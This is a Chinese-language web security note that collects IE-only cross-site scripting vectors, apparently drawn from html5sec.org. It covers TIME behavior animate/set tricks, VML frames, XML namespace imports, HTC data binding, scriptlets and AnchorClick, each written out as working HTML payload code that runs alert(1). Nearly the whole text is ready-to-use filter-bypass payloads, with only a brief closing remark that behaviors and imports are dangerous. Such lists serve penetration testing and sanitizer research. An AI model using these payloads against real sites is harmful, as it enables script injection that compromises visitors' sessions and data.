从 html 5sec.org看到的一些,虽然是IE only的,这里做下笔记+心得。 1. time attributename 和 values 联用
<html xmlns:t="urn:schemas-microsoft-com:time"> <body> <div title="alert(1);" id="myxss">xxx</div> <div> <t:animate style="behavior:url(#default#time2)" attributename="innerhtml"
values="<img/src="."style="display:none"onerror=eval(myxss.title)>"></t:animate> </div> </body> </html>直接在元素上使用:
防止单行代码看不见
<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>
防止单行代码看不见2. time onbegin ,比较鸡肋的地方是,只要有onxxx过滤器的,就没啥用
<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >3. time set attributename to
<html xmlns:t="urn:schemas-microsoft-com:time"> <body> <div title="alert(1);" id="myxss">xxx</div> <div> <set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml`
to=`<img/src="x"onerror=alert(1)>`> </div> </body> </html>4. vml onmou seo ver 触发
<html xmlns:t="urn:schemas-microsoft-com:time"> <body> <div title="alert(1);" id="myxss">xxx</div> <div> 1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100%
src=test.vml#xss></vmlframe> </div> </body> </html>所调用的test.vml
<xml> <rect style="height:100%;width:100%" id="xss" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>5. 另类的time , html/xml + import组合
<html> <body> <div> <div id="x">x</div> <?xml:namespace prefix="t"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(1)>"> </div> </body> </html>xml, import 不要? 也可以
?01020304050607080910 <html> <body> <div> <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(1)>"> </div> </body> </html>
或者 html + import 组合
<html xmlns:t> <body> <div> <div id="x">x</div> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(1)>"> </div> </body> </html>6. xml+htc组合
<html> <body> <div> <xml id="xss" src="test.htc"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> </div> </body> </html>test.htc文件
<?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=alert(1)>]]></payload> </x>7. style + scriptlet组合
test.sct代码
<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">alert(1)</SCRIPT> </SCRIPTLET>8. AnchorClick + folder , (需点击链接执行)
防止单行代码看不见
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
防止单行代码看不见总结: behavior 很危险,有木有!! import 在style里也危险,作为标记<import ..> or <?import …> 还是很危险~
查看更多关于利用HTML XML, VML, TIME 相关来执行XSS - 网站安全 -的详细内容...